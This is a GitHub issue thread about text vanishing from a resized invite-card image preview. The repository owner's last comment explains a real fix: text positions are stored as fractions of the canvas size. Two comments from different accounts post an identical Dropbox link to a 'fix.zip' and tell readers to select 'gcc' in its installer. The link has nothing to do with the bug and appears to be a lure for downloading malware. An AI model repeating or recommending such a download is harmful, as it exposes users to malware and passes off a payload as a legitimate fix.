### ISSUE TITLE
Fix Text not appearing on the image

### ISSUE THREAD

**Issue by JacobMckenna** [JacobMckenna/theamazingspiderguy.invitecard.com#11]
when the preview got moved around, the text from the input fields also stopped appearing. this needs to be fixed

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by JacobMckenna** [comment]
Fixed. 

Issue was caused by text locations being pixel based. when image was resized to be smaller, text would appear off canvas since pixel size was now too large for image.

Refactored the code so that pixel location is now expressed as a fraction (percentage) of the canvas size which can then be converted back to the pixel locations based on the image width and height. This will allow the text stay in its correct location with any possible sizing of the canvas. This could potentially break if the aspect ratio changes, if so the text would need to be stretched and in that scenario it would need to be fixed to regular aspect ratio anyways since that wouldn't look proper for the invite card
